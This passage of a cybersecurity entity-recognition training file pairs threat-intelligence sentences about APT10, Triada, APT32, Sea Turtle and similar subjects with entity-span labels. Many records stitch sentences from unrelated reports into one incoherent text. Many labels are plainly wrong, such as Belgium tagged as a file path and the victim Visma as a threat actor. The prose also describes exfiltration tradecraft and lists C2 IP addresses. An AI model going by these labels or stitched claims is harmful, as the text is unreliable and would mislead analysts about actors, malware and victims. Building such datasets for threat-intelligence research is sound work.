— the same date the first authenticated login to Visma’s network was made using stolen credentials . 
After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE . This means that APT10 actors had two separate access points into the Visma network . This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack . Other examples of malicious infrastructure registered with internet.bs include domains for APT28’s VPNFilter malware campaign and the registration of the cyber-berkut . org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach . The attacker gained access to the victim’s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe.” The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 . The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . 
APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . For Exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe” to r.exe” to create archives , upload them with curl.exe” (renamed to c.exe”) , and again , use the cloud storage provider Dropbox . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma . Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host . Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 . We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations . APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S. Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security . 
This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains .", "spans": {"ORGANIZATION: Kaspersky": [[64, 73], [22019, 22028], [24975, 24984]], "THREAT_ACTOR: ScarCruft": [[101, 110]], "VULNERABILITY: CVE-2010-3962": [[140, 153]], "VULNERABILITY: CVE-2014-1776": [[196, 209]], "THREAT_ACTOR: Shadow Brokers": [[274, 288], [1005, 1019], [3674, 3688]], "THREAT_ACTOR: Equation": [[350, 358]], "MALWARE: DoublePulsar backdoor": [[514, 535], [1530, 1551], [1886, 1907]], "MALWARE: FuzzBunch": [[542, 551], [3564, 3573]], "MALWARE: framework": [[552, 561]], "MALWARE: EternalBlue": [[572, 583]], "MALWARE: EternalSynergy": [[586, 600]], "MALWARE: EternalRomance": [[607, 621]], "MALWARE: exploit": [[622, 629]], "MALWARE: tools": [[630, 635], [8306, 8311]], "THREAT_ACTOR: Buckeye": [[648, 655], [785, 792], [884, 891], [1071, 1078], [3742, 3749], [3915, 3922], [5119, 5126], [7830, 7837]], "MALWARE: leaked tools": [[693, 705]], "MALWARE: Equation Group tools": [[761, 781]], "MALWARE: Bemstour exploit tool": [[1110, 1131]], "MALWARE: DoublePulsar": [[1140, 1152]], "VULNERABILITY: exploit": [[1302, 1309], [1689, 1696], [3043, 3050], [3171, 3178], [3235, 3242], [13486, 13493]], "MALWARE: Buckeye": [[1350, 1357]], "MALWARE: malware": [[1358, 1365], [6396, 6403], [17011, 17018], [20641, 20648]], "FILEPATH: Bemstour": [[1402, 1410], [1468, 1476], [1680, 1688], [1910, 1918], [2034, 2042], [2121, 2129], [2184, 2192], [2372, 2380]], "FILEPATH: Belgium": [[1458, 1465]], "FILEPATH: DoublePulsar": [[1554, 1566]], "MALWARE: Bemstour": [[1852, 1860]], "FILEPATH: Pirpi": [[2223, 2228]], "FILEPATH: backdoor": [[2229, 2237]], "MALWARE: different backdoor": [[2297, 2315]], "MALWARE: Trojan": [[2316, 2322]], "ORGANIZATION: Symantec": [[2389, 2397], [2664, 2672], [2767, 2775], [3867, 3875]], "VULNERABILITY: zero-day": [[2471, 2479], [2619, 2627], [3435, 3443], [4397, 4405]], "ORGANIZATION: Microsoft": [[2509, 
2518], [4929, 4938], [19108, 19117], [21879, 21888], [34533, 34542]], "FILEPATH: Filensfer": [[2521, 2530], [2806, 2815], [4287, 4296]], "VULNERABILITY: (CVE-2019-0703)": [[2673, 2688]], "SYSTEM: Windows": [[2715, 2722], [5822, 5829], [10384, 10391], [19118, 19125], [23425, 23432], [27401, 27408], [29866, 29873], [30127, 30134]], "FILEPATH: Buckeye malware": [[2967, 2982]], "MALWARE: (Backdoor.Pirpi)": [[2983, 2999]], "VULNERABILITY: CVE-2017-0143": [[3002, 3015]], "FILEPATH: tools—EternalRomance": [[3051, 3071]], "FILEPATH: EternalSynergy—that": [[3076, 3095]], "FILEPATH: EternalRomance": [[3186, 3200]], "FILEPATH: EternalSynergy": [[3214, 3228]], "FILEPATH: CVE-2017-0143": [[3247, 3260]], "MALWARE: Buckeye exploit tool": [[3378, 3398]], "THREAT_ACTOR: attackers": [[3502, 3511], [9933, 9942], [11592, 11601], [12983, 12992], [13460, 13469], [13792, 13801], [14050, 14059], [14520, 14529], [15406, 15415], [15471, 15480], [26683, 26692], [30323, 30332], [30778, 30787], [33651, 33660]], "MALWARE: FuzzBunch framework": [[3527, 3546]], "THREAT_ACTOR: Equation Group": [[3759, 3773], [21044, 21058]], "TOOL: RTF": [[3943, 3946]], "VULNERABILITY: CVE-2017-1882": [[3966, 3979]], "FILEPATH: eqnedt32.exe": [[3983, 3995]], "FILEPATH: dropper": [[4006, 4013]], "FILEPATH: iassvcs.exe": [[4026, 4037]], "THREAT_ACTOR: chinese APT": [[4187, 4198]], "ORGANIZATION: ancient soviet republics": [[4232, 4256]], "MALWARE: Internet Explorer": [[4497, 4514]], "MALWARE: Flash": [[4519, 4524]], "THREAT_ACTOR: cyberattacks": [[4610, 4622]], "FILEPATH: Hussarini": [[4726, 4735]], "FILEPATH: OutExtra.exe": [[4876, 4888]], "FILEPATH: finder.exe": [[4945, 4955]], "ORGANIZATION: DeepSight": [[5014, 5023], [7796, 7805]], "THREAT_ACTOR: attack": [[5222, 5228]], "MALWARE: DLL": [[5284, 5287]], "MALWARE: hijacking": [[5288, 5297]], "FILEPATH: malware": [[5313, 5320], [6685, 6692]], "THREAT_ACTOR: Iron": [[5505, 5509]], "MALWARE: IronStealer": [[5585, 5596]], "MALWARE: Iron ransomware": [[5601, 5616]], 
"FILEPATH: Xagent”": [[5619, 5626]], "FILEPATH: Xagent.exe": [[5652, 5662]], "FILEPATH: worm": [[5702, 5706]], "THREAT_ACTOR: Xagent": [[5709, 5715]], "THREAT_ACTOR: JbossMiner Mining": [[5731, 5748]], "TOOL: Python": [[5775, 5781]], "SYSTEM: Linux": [[5834, 5839]], "ORGANIZATION: FireEye's": [[5895, 5904]], "THREAT_ACTOR: Ke3chang": [[5930, 5938], [6173, 6181], [6321, 6329], [6438, 6446]], "MALWARE: backdoor": [[6192, 6200], [6992, 7000]], "MALWARE: Okrum": [[6210, 6215], [7015, 7020]], "MALWARE: BS2005 backdoors": [[6338, 6354]], "MALWARE: RoyalDNS": [[6387, 6395]], "ORGANIZATION: NCC": [[6418, 6421]], "FILEPATH: BS2005 backdoors": [[6736, 6752]], "FILEPATH: TidePool malware": [[6796, 6812]], "ORGANIZATION: Palo Alto": [[6834, 6843]], "FILEPATH: Okrum malware": [[7055, 7068], [7367, 7380]], "FILEPATH: backdoors": [[7161, 7170]], "FILEPATH: Okrum backdoor": [[7232, 7246]], "FILEPATH: Ketrican backdoor": [[7266, 7283]], "FILEPATH: Ketrican backdoors": [[7397, 7415]], "FILEPATH: RoyalDNS malware": [[7514, 7530]], "FILEPATH: Ketrican": [[7537, 7545]], "ORGANIZATION: ESET": [[7575, 7579], [22176, 22180]], "FILEPATH: Okrum": [[7592, 7597], [8046, 8051], [8422, 8427]], "THREAT_ACTOR: Okrum": [[8276, 8281]], "MALWARE: keylogger": [[8294, 8303]], "MALWARE: enumerating network sessions": [[8339, 8367]], "ORGANIZATION: ClearSky": [[8807, 8815], [9126, 9134]], "THREAT_ACTOR: Pyongyang-affiliated hackers": [[9006, 9034]], "ORGANIZATION: multinational companies’": [[9072, 9096]], "FILEPATH: WinRAR": [[9217, 9223]], "THREAT_ACTOR: Lotus Blossom": [[9327, 9340]], "THREAT_ACTOR: APT32": [[9568, 9573]], "ORGANIZATION: Researchers": [[9777, 9788]], "THREAT_ACTOR: Lazarus": [[9800, 9807], [10178, 10185]], "MALWARE: malicious implant": [[9851, 9868]], "THREAT_ACTOR: Rising Sun": [[9878, 9888]], "TOOL: Visual Basic": [[10127, 10139]], "MALWARE: Invoke-PSImage": [[10212, 10226]], "TOOL: PowerShell": [[10265, 10275]], "THREAT_ACTOR: it": [[10328, 10330]], "FILEPATH: cmd.exe": [[10435, 
10442]], "MALWARE: PowerShell": [[10491, 10501]], "ORGANIZATION: (DHS)": [[10540, 10545]], "ORGANIZATION: Talos": [[10760, 10765], [12887, 12892]], "ORGANIZATION: national security organizations": [[10880, 10911]], "ORGANIZATION: ministries": [[10914, 10924]], "ORGANIZATION: prominent energy organizations": [[10950, 10980]], "THREAT_ACTOR: actors": [[10994, 11000], [11128, 11134], [11236, 11242], [13948, 13954], [14225, 14231], [14582, 14588], [14813, 14819], [14960, 14966], [15667, 15673], [16380, 16386]], "THREAT_ACTOR: attacker": [[11409, 11417], [20405, 20413], [20548, 20556], [33103, 33111], [34368, 34376]], "THREAT_ACTOR: actor": [[11810, 11815], [12520, 12525], [12711, 12716], [12943, 12948]], "FILEPATH: Sea Turtle": [[11906, 11916]], "THREAT_ACTOR: threat vector": [[12033, 12046]], "THREAT_ACTOR: actors’": [[12342, 12349]], "MALWARE: MitM servers": [[12730, 12742], [14898, 14910]], "MALWARE: MitM server": [[12830, 12841], [13756, 13767]], "MALWARE: additional servers": [[12907, 12925]], "MALWARE: MitM": [[13074, 13078]], "THREAT_ACTOR: actor-controlled": [[13179, 13195], [13739, 13755]], "MALWARE: servers": [[13196, 13203], [15228, 15235]], "THREAT_ACTOR: actors'": [[13283, 13290]], "MALWARE: VPN applications": [[13314, 13330]], "MALWARE: Adaptive Security Appliance": [[13347, 13374]], "TOOL: ASA": [[13482, 13485]], "THREAT_ACTOR: they": [[13505, 13509], [15140, 15144]], "MALWARE: ASA's": [[13567, 13572]], "TOOL: VPN": [[13600, 13603], [15577, 15580], [31766, 31769], [31863, 31866], [33242, 33245], [33265, 33268]], "ORGANIZATION: Cafax": [[14274, 14279]], "ORGANIZATION: NetNod": [[14386, 14392]], "MALWARE: name servers": [[14647, 14659]], "THREAT_ACTOR: Sea Turtle": [[14662, 14672]], "ORGANIZATION: DNS registries": [[14726, 14740]], "ORGANIZATION: number of registrars": [[14747, 14767]], "MALWARE: Encrypts": [[14830, 14838]], "MALWARE: Comodo": [[14841, 14847]], "MALWARE: Sectigo": [[14850, 14857]], "MALWARE: self-signed certificates": [[14864, 14888]], 
"ORGANIZATION: manage": [[15085, 15091]], "ORGANIZATION: ccTLDs": [[15092, 15098]], "MALWARE: actor-controlled": [[15211, 15227]], "MALWARE: ASA": [[15563, 15566]], "ORGANIZATION: Cisco Talos": [[15789, 15800]], "MALWARE: xlsm file": [[16028, 16037]], "FILEPATH: it": [[16040, 16042]], "FILEPATH: link file": [[16144, 16153]], "FILEPATH: AutoHotkeyU32.exe": [[16180, 16197]], "MALWARE: TeamViewer": [[16328, 16338]], "FILEPATH: attacks": [[16425, 16432]], "THREAT_ACTOR: hacking division": [[16575, 16591]], "ORGANIZATION: NSA": [[16667, 16670]], "THREAT_ACTOR: CIA's hacking division": [[16780, 16802]], "MALWARE: hacking systems": [[16952, 16967]], "MALWARE: trojans": [[16970, 16977]], "MALWARE: viruses": [[16980, 16987]], "MALWARE: weaponized": [[17000, 17010]], "ORGANIZATION: Wikileaks": [[17147, 17156]], "THREAT_ACTOR: CIA": [[17231, 17234], [17501, 17504], [18053, 18056], [18832, 18835], [19046, 19049], [19706, 19709], [20034, 20037], [20143, 20146], [20637, 20640], [20950, 20953], [21679, 21682], [21765, 21768], [22440, 22443]], "MALWARE: Weeping Angel": [[17702, 17715]], "THREAT_ACTOR: CIA's": [[17735, 17740], [18152, 18157], [18374, 18379], [18634, 18639], [19151, 19156], [19535, 19540], [20331, 20336], [21145, 21150], [21369, 21374]], "MALWARE: smart TVs": [[17787, 17796]], "THREAT_ACTOR: Weeping Angel": [[17907, 17920]], "MALWARE: iPhones": [[18468, 18475]], "MALWARE: Apple": [[18486, 18491]], "MALWARE: iOS": [[18509, 18512]], "MALWARE: iPads": [[18523, 18528]], "ORGANIZATION: Samsung smart TVs": [[18550, 18567]], "THREAT_ACTOR: MI5/BTSS": [[18623, 18631]], "MALWARE: GCHQ": [[18727, 18731]], "MALWARE: NSA": [[18734, 18737]], "MALWARE: cyber arms contractors": [[18762, 18784]], "MALWARE: Hammer Drill": [[19255, 19267]], "MALWARE: Brutal Kangaroo": [[19415, 19430]], "MALWARE: Assassin": [[19680, 19688]], "MALWARE: Medusa": [[19693, 19699]], "MALWARE: Windows": [[19793, 19800]], "MALWARE: Mac OS X": [[19803, 19811]], "MALWARE: Solaris": [[19814, 19821]], "MALWARE: 
Linux": [[19824, 19829]], "MALWARE: HIVE": [[19855, 19859], [21654, 21658]], "MALWARE: Cutthroat": [[19876, 19885]], "MALWARE: Swindle": [[19890, 19897]], "ORGANIZATION: Apple": [[20013, 20018], [21871, 21876]], "ORGANIZATION: Google": [[20023, 20029], [21891, 21897]], "MALWARE: USB containing malware": [[20433, 20455]], "ORGANIZATION: media": [[20604, 20609]], "SYSTEM: Android": [[20722, 20729]], "ORGANIZATION: Comodo": [[20927, 20933]], "ORGANIZATION: CIA": [[21007, 21010]], "THREAT_ACTOR: UMBRAGE": [[21175, 21182]], "MALWARE: 'JQJIMPROVISE'": [[21375, 21389]], "FILEPATH: Margarita": [[21525, 21534]], "ORGANIZATION: Samsung": [[21900, 21907]], "ORGANIZATION: Nokia": [[21910, 21915]], "ORGANIZATION: Blackberry": [[21918, 21928]], "ORGANIZATION: Siemens": [[21931, 21938]], "ORGANIZATION: anti-virus companies": [[21943, 21963]], "ORGANIZATION: gaming industry": [[22262, 22277]], "ORGANIZATION: Kaspersky’s": [[22351, 22362]], "THREAT_ACTOR: Winnti": [[22363, 22369]], "MALWARE: OSB": [[22401, 22404]], "ORGANIZATION: Recorded Future": [[22625, 22640], [28232, 28247]], "ORGANIZATION: Rapid7": [[22645, 22651], [30268, 30274], [30756, 30762], [31110, 31116], [32951, 32957], [33288, 33294], [33535, 33541], [34271, 34277], [34713, 34719]], "FILEPATH: Honeycomb": [[22699, 22708]], "TOOL: C2": [[22878, 22880], [29330, 29332], [30087, 30089], [33642, 33644], [34623, 34625]], "THREAT_ACTOR: APT10": [[23095, 23100], [23263, 23268], [23271, 23276], [23717, 23722], [23940, 23945], [24454, 24459], [24645, 24650], [25011, 25016], [25078, 25083], [25294, 25299], [25441, 25446], [26186, 26191], [26519, 26524], [26847, 26852], [27058, 27063], [27585, 27590], [27971, 27976], [28269, 28274], [28568, 28573], [29260, 29265], [29830, 29835], [30032, 30037], [31005, 31010], [31311, 31316], [31407, 31412], [31517, 31522], [32057, 32062], [32296, 32301], [32480, 32485], [32974, 32979], [33310, 33315], [33860, 33865], [34099, 34104], [34508, 34513], [34829, 34834], [35400, 35405], [35593, 
35598]], "MALWARE: UPPERCUT": [[23204, 23212], [31346, 31354]], "MALWARE: WinRAR": [[23334, 23340], [29846, 29852], [34110, 34116]], "TOOL: Dropbox": [[23390, 23397], [29972, 29979], [34330, 34337]], "MALWARE: cURL": [[23416, 23420], [29857, 29861]], "FILEPATH: UMBRAGE": [[23453, 23460]], "THREAT_ACTOR: Stone Panda": [[23737, 23748]], "THREAT_ACTOR: menuPass": [[23751, 23759]], "THREAT_ACTOR: CVNX": [[23762, 23766]], "THREAT_ACTOR: MSS": [[24222, 24225], [26054, 26057]], "ORGANIZATION: U.S. law firm": [[24667, 24680]], "ORGANIZATION: apparel company": [[24702, 24717], [27024, 27039], [32995, 33010]], "TOOL: DLL": [[24856, 24859], [29538, 29541], [30901, 30904], [31218, 31221], [32252, 32255], [33454, 33457], [33504, 33507]], "THREAT_ACTOR: APT10’s": [[24874, 24881]], "ORGANIZATION: Japanese corporations": [[24895, 24916], [31370, 31391]], "THREAT_ACTOR: Winnti Group": [[24996, 25008]], "ORGANIZATION: healthcare": [[25110, 25120]], "ORGANIZATION: defense": [[25123, 25130]], "ORGANIZATION: aerospace": [[25133, 25142]], "ORGANIZATION: government": [[25145, 25155]], "ORGANIZATION: heavy industry": [[25158, 25172]], "ORGANIZATION: mining": [[25177, 25183]], "ORGANIZATION: MSPs": [[25190, 25194], [28768, 28772], [34966, 34970]], "ORGANIZATION: IT services": [[25199, 25210]], "ORGANIZATION: sectors": [[25230, 25237]], "ORGANIZATION: Tianjin-based companies": [[25474, 25497]], "ORGANIZATION: Huaying Haitai Science": [[25510, 25532]], "THREAT_ACTOR: Chinese state-sponsored": [[25759, 25782]], "THREAT_ACTOR: Guangdong ITSEC": [[25837, 25852]], "ORGANIZATION: Boyusec": [[25920, 25927]], "THREAT_ACTOR: APT3": [[25974, 25978]], "MALWARE: Citrix": [[26574, 26580], [30799, 30805], [33162, 33168]], "MALWARE: LogMeIn": [[26585, 26592]], "ORGANIZATION: law firm": [[27007, 27015], [30588, 30596], [33081, 33089]], "ORGANIZATION: IT service": [[27112, 27122]], "ORGANIZATION: (MSPs)": [[27133, 27139]], "FILEPATH: 'Improvise'": [[27219, 27230]], "SYSTEM: MacOS": [[27423, 27428]], "TOOL: 
JukeBox": [[27431, 27438]], "TOOL: DanceFloor": [[27453, 27463]], "MALWARE: (Quasar RAT": [[27617, 27628]], "MALWARE: Trochilus": [[27631, 27640], [29307, 29316], [32204, 32213]], "MALWARE: RedLeaves": [[27643, 27652]], "MALWARE: ChChes": [[27655, 27661]], "ORGANIZATION: U.S. Department": [[27743, 27758]], "THREAT_ACTOR: Visma": [[28127, 28132]], "ORGANIZATION: MSP": [[28625, 28628]], "ORGANIZATION: Recorded Future’s": [[28640, 28657]], "ORGANIZATION: infrastructure providers": [[28793, 28817]], "THREAT_ACTOR: Rapid7": [[29066, 29072]], "MALWARE: Visma endpoints": [[29185, 29200]], "FILEPATH: sample": [[29471, 29477]], "FILEPATH: Trochilus": [[29497, 29506]], "FILEPATH: configuration file": [[29720, 29738]], "MALWARE: Dropbox": [[30072, 30079], [30292, 30299], [34261, 34268]], "TOOL: WinRAR": [[30107, 30113]], "MALWARE: Visma": [[30212, 30217], [30943, 30948]], "MALWARE: Dropbox API": [[30233, 30244]], "ORGANIZATION: They": [[30417, 30421]], "ORGANIZATION: Rapid7’s": [[30552, 30560]], "MALWARE: 1.bat": [[31046, 31051], [33753, 33758]], "MALWARE: cu.exe": [[31054, 31060]], "MALWARE: ss.rar": [[31063, 31069]], "MALWARE: r.exe": [[31072, 31077]], "MALWARE: pd.exe": [[31080, 31086]], "FILEPATH: gup.exe": [[31159, 31166]], "FILEPATH: ANEL": [[31304, 31308]], "MALWARE: Visma network": [[31449, 31462], [32349, 32362], [34492, 34505]], "ORGANIZATION: Visma": [[31551, 31556]], "MALWARE: Citrix remote desktop": [[31597, 31618]], "THREAT_ACTOR: Insikt Group": [[31708, 31720]], "FILEPATH: Citrix-hosted": [[31819, 31832]], "THREAT_ACTOR: APT28’s": [[32639, 32646]], "MALWARE: VPNFilter": [[32647, 32656]], "MALWARE: cyber-berkut": [[32702, 32714]], "THREAT_ACTOR: CyberBerkut": [[32819, 32830]], "FILEPATH: KHRAT": [[32833, 32838]], "MALWARE: backdoor trojan": [[32844, 32859]], "THREAT_ACTOR: DragonOK": [[32924, 32932]], "MALWARE: Mimikatz": [[33415, 33423]], "FILEPATH: Dropbox": [[33627, 33634]], "MALWARE: rar.exe”": [[34129, 34137]], "MALWARE: r.exe”": [[34141, 34147]], "MALWARE: 
BITSAdmin": [[34543, 34552]], "THREAT_ACTOR: APT10's": [[34927, 34934]], "ORGANIZATION: economic": [[35450, 35458]]}, "info": {"id": "cyberner_stix_train_002201", "source": "cyberner_stix_train"}} {"text": "Perhaps the Dukes group thought that by faking a timestamp from before the earliest one cited in the whitepaper , they might be able to confuse researchers .", "spans": {"THREAT_ACTOR: Dukes": [[12, 17]]}, "info": {"id": "cyberner_stix_train_002202", "source": "cyberner_stix_train"}} {"text": "All nine certificates were used maliciously in 2015 .", "spans": {}, "info": {"id": "cyberner_stix_train_002203", "source": "cyberner_stix_train"}} {"text": "Beginning in May 2017 , FireEye observed a number of Ukrainian websites compromised with BACKSWING v1 , and in June 2017 , began to see content returned from BACKSWING receivers . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": {"ORGANIZATION: FireEye": [[24, 31]], "ORGANIZATION: BACKSWING v1": [[89, 101]], "ORGANIZATION: BACKSWING": [[158, 167]], "FILEPATH: ChopShop1": [[180, 189]], "ORGANIZATION: MITRE Corporation": [[226, 243]]}, "info": {"id": "cyberner_stix_train_002204", "source": "cyberner_stix_train"}} {"text": "FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows .", "spans": {"ORGANIZATION: FireEye Labs": [[0, 12]], "VULNERABILITY: zero-day": [[65, 73]], "TOOL: Adobe Flash": [[93, 104]], "ORGANIZATION: Microsoft": [[128, 137]], "SYSTEM: Windows": [[138, 145]]}, "info": {"id": "cyberner_stix_train_002205", "source": "cyberner_stix_train"}} {"text": "MD5s : c4c4077e9449147d754afd972e247efc Document.apk 0b8806b38b52bebfe39ff585639e2ea2 WUC ’ s Conference.apk Triada : organized crime on Android Triada is a modular mobile Trojan that actively uses 
root privileges to substitute system files and uses several clever methods to become almost invisible March 3 , 2016 You know how armies typically move : first come the scouts to make sure everything is ok. Then the heavy troops The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . The actor then made subtle modifications to the file and uploaded the newly created file to the same popular antivirus testing website in order to determine how to evade detection .", "spans": {"MALWARE: Triada": [[109, 115], [145, 151]], "SYSTEM: Android": [[137, 144]], "TOOL: Lambert family malware": [[446, 468]], "ORGANIZATION: FireEye": [[519, 526]], "VULNERABILITY: zero day exploit": [[549, 565]], "VULNERABILITY: CVE-2014-4148": [[568, 581]], "THREAT_ACTOR: actor": [[607, 612]]}, "info": {"id": "cyberner_stix_train_002206", "source": "cyberner_stix_train"}} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 .", "spans": {"MALWARE: Microsoft Word documents": [[64, 88]], "VULNERABILITY: CVE-2017-0199": [[100, 113]], "FILEPATH: Okrum backdoor": [[175, 189]], "FILEPATH: Ketrican backdoor": [[209, 226]]}, "info": {"id": "cyberner_stix_train_002207", "source": "cyberner_stix_train"}} {"text": "Small Trojans like Leech , Ztorg and Gopro now download one of the most advanced mobile Trojans our malware analysts have ever encountered — we call it Triada . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 .", "spans": {"MALWARE: Leech": [[19, 24]], "MALWARE: Ztorg": [[27, 32]], "MALWARE: Gopro": [[37, 42]], "MALWARE: Triada": [[152, 158]], "MALWARE: files": [[165, 170]], "VULNERABILITY: Microsoft Office vulnerability": [[194, 224]], "VULNERABILITY: CVE-2012-0158": [[227, 240]], "ORGANIZATION: defense industry": [[427, 443]]}, "info": {"id": "cyberner_stix_train_002209", "source": "cyberner_stix_train"}} {"text": "A recent whois of “ goldncup.com ” . Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors . The graph highlights the at least 3 different variants of Ursnif that were being hosted on the bevendbrec.com site . The fact the attackers were attempting to connect in realtime with victims over phones and video conferences for conversations rather than just engaging over email is also unusual , suggesting confidence in the attackers skills in English and in impersonation although it is not clear if any conversations ended up taking place .", "spans": {"ORGANIZATION: FireEye": [[59, 66]], "THREAT_ACTOR: APT32": [[80, 85]], "ORGANIZATION: foreign corporations": [[96, 116]], "ORGANIZATION: manufacturing": [[154, 167]], "ORGANIZATION: consumer products": [[170, 187]], "ORGANIZATION: hospitality sectors": [[194, 213]], "MALWARE: Ursnif": [[274, 280]], "DOMAIN: bevendbrec.com": [[311, 325]], "THREAT_ACTOR: attackers": [[346, 355]]}, "info": {"id": "cyberner_stix_train_002210", "source": "cyberner_stix_train"}} {"text": "The “ VPN Filter ” malware has also been attributed to STRONTIUM by the FBI .", "spans": {"MALWARE: VPN Filter": [[6, 16]], "THREAT_ACTOR: STRONTIUM": [[55, 64]], "ORGANIZATION: FBI": [[72, 75]]}, "info": 
{"id": "cyberner_stix_train_002211", "source": "cyberner_stix_train"}} {"text": "The Dukes primarily target Western governments and related organizations , such as government ministries and agencies , political think tanks , and governmental subcontractors .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_002212", "source": "cyberner_stix_train"}} {"text": "Given that this is an active threat , we ’ ve been working behind-the-scenes with our customers to ensure both personal and enterprise customers are protected from this threat and only decided to come forward with this information after the research team at Kaspersky released a report earlier today . WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla – the White Atlas framework \" from mid-2016 . Each value under this key represents a separate Svchost group and appears as a separate instance when you are viewing active processes . 
The videos were quickly passed around offices while users ’ systems were silently infected in the background , and many of the APT ’s components were signed with phony Intel and AMD digital certificates .", "spans": {"ORGANIZATION: Kaspersky": [[258, 267]], "TOOL: WhiteBear": [[302, 311]], "TOOL: Skipper Turla": [[357, 370], [443, 456]], "TOOL: White Atlas": [[463, 474]], "TOOL: Svchost": [[551, 558]]}, "info": {"id": "cyberner_stix_train_002213", "source": "cyberner_stix_train"}} {"text": "While we believe CosmicDuke to be an entirely custom- written toolset with no direct sharing of code with other Duke toolsets , the high-level ways in which many of its features have been implemented appear to be shared with other members of the Duke arsenal .", "spans": {"MALWARE: CosmicDuke": [[17, 27]], "THREAT_ACTOR: Duke": [[112, 116], [246, 250]]}, "info": {"id": "cyberner_stix_train_002214", "source": "cyberner_stix_train"}} {"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . Hackers used the remote access to detect servers of their interest in the internal network .", "spans": {"MALWARE: Ploutus": [[55, 62]]}, "info": {"id": "cyberner_stix_train_002215", "source": "cyberner_stix_train"}} {"text": "The commands received via GCM can not be blocked immediately on an infected device . Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip , we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations . As with previous ShadowPad variants , the Config module ( 102 ) contains an encrypted string pool that can be accessed from any other module . 
If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions .", "spans": {"SYSTEM: GCM": [[26, 29]], "MALWARE: ShadowPad": [[367, 376]], "VULNERABILITY: If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions": [[493, 691]]}, "info": {"id": "cyberner_stix_train_002216", "source": "cyberner_stix_train"}} {"text": "220.158.216.127 to gather additional Zebrocy samples as well as a weaponized document .", "spans": {"IP_ADDRESS: 220.158.216.127": [[0, 15]], "MALWARE: Zebrocy": [[37, 44]]}, "info": {"id": "cyberner_stix_train_002217", "source": "cyberner_stix_train"}} {"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack .", "spans": {"THREAT_ACTOR: attackers": [[14, 23]], "MALWARE: MS PowerPoint document": [[32, 54]], "VULNERABILITY: CVE-2014-6352": [[80, 93]], "THREAT_ACTOR: Threat Group 3390": [[110, 127]], "THREAT_ACTOR: Emissary Panda": [[144, 158]]}, "info": {"id": "cyberner_stix_train_002219", "source": "cyberner_stix_train"}} {"text": "The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions , ATM compromise , and other monetization schemes . APT28 espionage activity has primarily targeted entities in the U.S. 
